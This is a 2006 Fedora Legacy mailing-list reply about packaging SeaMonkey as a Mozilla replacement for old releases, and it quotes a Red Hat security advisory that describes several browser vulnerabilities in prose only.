On Wednesday 08 November 2006 05:43, David Eisenstein wrote: >Hello Fedora Legacy and Extras folks, > >This below RHEL advisory just came out, along with advisories like this > for Thunderbird and for Firefox. We in Legacy need to get busy on > these, because they are critical bugs, and we haven't updated any > Firefox, Thunderbird, or SeaMonkey (er, Mozilla) packages in a LONG > time. > >There are some old Bugzilla's that had been open for RHL 7.3, RHL 9, FC > 1, FC 2, and FC 3 for Mozilla. There has been a running discussion (and > no action -- largely my fault -- sorry!) about how and whether we > upgrade Mozilla to SeaMonkey so that SeaMonkey becomes a Mozilla > replacement (Core) package rather than an Extras package on a Bugzilla > ticket for SeaMonkey. The Bugzilla number is 209167: ><https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=209167>. > >My understanding is that Michal Jaegermann (Fedora Legacy contributor) > has done work on at least one or more previous versions of SeaMonkey, > having created (FC4?) packages that should, once installed, act as a > Mozilla replacement, not unlike what the RHEL packages mentioned in > RHSA-2006-0734 do. > >The advantage of having SeaMonkey do this is that all other packages > (such as yelp, epiphany, possibly others) will inherit the more secure > code from SeaMonkey, since they tap into the shared-library (.so) files > that SeaMonkey would be providing. My understanding then also would be > that SeaMonkey is meant to be API compatible with Mozilla, so that other > programs that depend on functions (or objects) in Mozilla's > shared-library should continue to work okay, possibly without > recompilation, but probably requiring recompilation and pushing to > updates. > >Does anyone have any comments on how you wish the Legacy Project to > approach this? I favor SeaMonkey as a Mozilla replacement, as it covers > all vulnerabilities in packages that dynamically link to the shared > libraries. But perhaps there are other ideas. > >Since Legacy Mozilla/Firefox/Thunderbird security bugs have been open > since June (and not worked on), I also advocate that we in Legacy build > SeaMonkey packages for *all* releases of Fedora Core that we have ever > supported (since older releases were supported at that time) and RHL 7.3 > and RHL 9. Does anyone object to that? > >What say ye?? > As an interested sidewalk superintendant, I'd say go with seamonkey since a lot of that stuff comes for free with it.
> Regards, > David Eisenstein > > > >-------- Original Message -------- >Subject: [RHSA-2006:0734-01] Critical: seamonkey security update >Date: Wed, 8 Nov 2006 04:48:59 -0500 >From: [EMAIL PROTECTED] >To: [EMAIL PROTECTED] > >--------------------------------------------------------------------- > Red Hat Security Advisory > >Synopsis: Critical: seamonkey security update >Advisory ID: RHSA-2006:0734-01 >Advisory URL: https://rhn.redhat.com/errata/RHSA-2006-0734.html >Issue date: 2006-11-08 >Updated on: 2006-11-08 >Product: Red Hat Enterprise Linux >CVE Names: CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 > CVE-2006-5747 CVE-2006-5748 >--------------------------------------------------------------------- > >1. Summary: > >Updated seamonkey packages that fix several security bugs are now > available for Red Hat Enterprise Linux 2.1, 3, and 4. > >This update has been rated as having critical security impact by the Red >Hat Security Response Team. > >2. Relevant releases/architectures: > >... (RHEL 2.1, RHEL 3, RHEL 4) ... > >3. Problem description: > >SeaMonkey is an open source Web browser, advanced email and newsgroup >client, IRC chat client, and HTML editor. > >Several flaws were found in the way SeaMonkey processes certain malformed >Javascript code. A malicious web page could cause the execution of >Javascript code in such a way that could cause SeaMonkey to crash or >execute arbitrary code as the user running SeaMonkey. (CVE-2006-5463, >CVE-2006-5747, CVE-2006-5748) > >Several flaws were found in the way SeaMonkey renders web pages. A >malicious web page could cause the browser to crash or possibly execute >arbitrary code as the user running SeaMonkey. (CVE-2006-5464) > >A flaw was found in the way SeaMonkey verifies RSA signatures. For RSA > keys with exponent 3 it is possible for an attacker to forge a signature > that would be incorrectly verified by the NSS library. SeaMonkey as > shipped trusts several root Certificate Authorities that use exponent 3. > An attacker could have created a carefully crafted SSL certificate which > be incorrectly trusted when their site was visited by a victim. This > flaw was previously thought to be fixed in SeaMonkey 1.0.5, however > Ulrich Kuehn discovered the fix was incomplete (CVE-2006-5462) > >Users of SeaMonkey are advised to upgrade to these erratum packages, > which contains SeaMonkey version 1.0.6 that corrects these issues. > ><<snip>> -- Cheers, Gene "There are four boxes to be used in defense of liberty: soap, ballot, jury, and ammo. Please use in that order." -Ed Howdershelt (Author) Yahoo.com and AOL/TW attorneys please note, additions to the above message by Gene Heskett are: Copyright 2006 by Maurice Eugene Heskett, all rights reserved. -- fedora-legacy-list mailing list fedora-legacy-list@redhat.com https://www.redhat.com/mailman/listinfo/fedora-legacy-list
